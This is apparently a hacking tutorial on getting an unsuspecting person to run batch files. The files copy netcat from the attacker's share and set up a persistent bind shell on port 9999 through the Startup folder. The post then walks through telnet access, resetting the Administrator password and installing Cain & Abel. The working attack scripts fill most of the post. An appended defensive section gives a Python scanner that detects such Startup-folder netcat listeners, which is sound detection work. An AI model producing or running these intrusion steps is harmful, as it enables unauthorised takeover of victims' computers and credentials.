Now to do this you need a very innocent target! As we all know, a Trojan is very likely to be picked up by AV. What you need is Netcat: it opens a port on a computer for access (if used correctly from a batch file, you open a port on the target computer). You will need to write a batch file.
The batch file that copies Netcat onto the remote computer will have to be run from the target computer (the person at the target will have to run the batch file in some way). Open Notepad and type this in:
Code
@echo off
cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe (just to be sure)
cd "Documents and Settings"
cd "All Users"
cd "Start Menu"
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Save the file as a batch file using Notepad. The next batch file will be used to make sure the port you specified opens up every time Windows starts up; you can specify any port you wish. Open Notepad and type this:
Code
@echo off
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Save the file as a batch file using Notepad; this will be the file that is copied into the Startup folder by the previous batch file we wrote. You can attach the batch file to another file and share that file, and let the target run it so that it copies Netcat and the other batch file onto his/her computer, therefore opening port 9999. After port 9999 has been opened you can then use telnet to connect to that port on the target computer and have full access without ever needing any passwords of any sort. After you are in, change the Administrator password in case something happens to your files; the command is this:
net user Administrator newpassword
Now from here you can do what you want! Example: try shutting down the target computer by browsing to his system32 folder and then typing:
shutdown -r -t 10 -c "Hello"
The computer will then restart in 10 seconds' time. You can even play around more by installing Cain & Abel on your computer and then installing Abel on his computer (since you know the Administrator password). Once you have Abel on the target you can start and stop services and do more!
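From the defender's side, the persistence described above (a .bat in the all-users Startup folder launching `netcat.exe -L -p 9999 -d -e cmd.exe`) is easy to spot on disk. The following is an added example, not part of the original post: a small Python scanner that parses batch-file contents for netcat-family listeners that hand a shell to whoever connects. The file paths and contents are constructed samples.

```python
import ntpath
from typing import Dict, List, Optional

# Constructed sample of .bat files as they might sit in an all-users Startup
# folder (assumption: paths and contents are illustrative, not from a real host).
STARTUP_DIR = r"C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
SAMPLE_STARTUP_FILES: Dict[str, str] = {
    STARTUP_DIR + r"\Startup.bat": "@echo off\r\ncd\\\r\nnetcat.exe -L -p 9999 -d -e cmd.exe\r\n",
    STARTUP_DIR + r"\sync.bat": "@echo off\r\nrobocopy C:\\data D:\\backup /MIR\r\n",
    STARTUP_DIR + r"\update.bat": "@echo off\r\nstart /min nc.exe -l -p 4444 -e cmd.exe\r\n",
}

NETCAT_NAMES = {"nc", "nc64", "ncat", "netcat"}   # common netcat-family binary names
SHELLS = {"cmd", "cmd.exe", "powershell", "powershell.exe"}

def parse_bind_shell_line(line: str) -> Optional[dict]:
    """Return details if `line` starts a netcat listener that serves a shell, else None."""
    tokens = line.strip().split()
    for i, tok in enumerate(tokens):
        base = ntpath.basename(tok).lower()
        if base.endswith(".exe"):
            base = base[:-4]
        if base in NETCAT_NAMES:
            args = tokens[i + 1:]
            break
    else:
        return None
    shell = port = None
    listen = persistent = False
    for j, arg in enumerate(args):
        nxt = args[j + 1] if j + 1 < len(args) else None
        if arg in ("-e", "-c") and nxt and nxt.lower() in SHELLS:
            shell = nxt                      # program handed to the remote peer
        elif arg == "-p" and nxt and nxt.isdigit():
            port = int(nxt)
        elif arg.startswith("-") and not arg.startswith("--"):
            listen |= "l" in arg.lower()     # -l / -L / -lvp style listen flags
            persistent |= "L" in arg         # -L: Windows netcat re-listens after disconnect
    if shell and listen:
        return {"line": line.strip(), "port": port, "shell": shell, "persistent": persistent}
    return None

def scan_startup_files(files: Dict[str, str]) -> List[dict]:
    """Flag every line in every Startup-folder script that launches a netcat bind shell."""
    findings = []
    for path, content in files.items():
        for line in content.splitlines():
            hit = parse_bind_shell_line(line)
            if hit:
                findings.append({"path": path, **hit})
    return findings

if __name__ == "__main__":
    for f in scan_startup_files(SAMPLE_STARTUP_FILES):
        print(f"{f['path']}: port {f['port']} -> {f['shell']} (persistent={f['persistent']})")
```

On a live host, feed it the contents of the Startup folder, Run keys and scheduled tasks, and pair the result with a `netstat -ano` check for unexpected listening ports.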